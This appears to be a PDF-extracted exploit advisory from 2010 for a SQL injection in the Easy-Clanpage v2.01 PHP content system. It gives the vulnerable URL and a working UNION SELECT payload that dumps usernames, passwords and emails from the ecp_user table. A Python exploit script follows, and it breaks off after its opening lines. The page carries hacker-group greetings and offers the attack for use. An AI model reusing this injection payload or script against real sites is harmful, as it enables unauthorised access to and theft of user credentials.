EasyClanpage v2.01 SQL Injection Exploit.pdf

1 −−−−−−−−−−−−−−−−−−−−−−−−−−−−Information−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 2 +Name : Easy−Clanpage <= v2.01 SQL Injection Exploit 3 +Autor : Easy Laster 4 +Date : 25.03.2010 5 +Script Easy−Clanpage <= v2.01 6 +Download : Update Version 2.0−>2.01 : http://www.easy−clanpage.de/?section= 7 downloads&action=viewdl&id=13 8 +Price : for free 9 +Language : PHP 10 +Discovered by Easy Laster 11 +Security Group 4004−Security−Project 12 +Greetz to Team−Internet ,Underground Agents 13 +And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok, 14 Kiba,−tmh−,Dr Chaos,HANN!BAL,Kabel,−=Player=−,Lidloses_Auge, 15 N00bor,Ic3Drag0n,novaca!ne. 16 17 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 18 19 ___ ___ ___ ___ _ _ _____ _ _ 20 | | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_ 21 |_ | | | | |_ |___|_ −| −_| _| | | _| | _| | |___| __| _| . | | | −_| _| _| 22 |_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_| 23 |___| |___| 24 25 26 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 27 +Vulnerability : http://www.site.com/Easy−Clanpage/?section=user&action=details&id= 28 29 #SQL Injection 30 +Exploitable : http://www.site.com/Easy−Clanpage/?section=user&action=details&id=1 31 +union+select+concat(username,0x3a,password,0x3a,email)+from+ecp_user+where+userID=1−− 32 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 33 34 #SQL Injection Exploit 35 36 #!/usr/bin/env python 37 #−*− coding:utf−8 −*− 38 import sys, urllib2, re 39 40 if len(sys.argv) < 2: 41 print "***************************************************************" 42 print "************ Easy−Clanpage v2.01 Profil Page Hack *************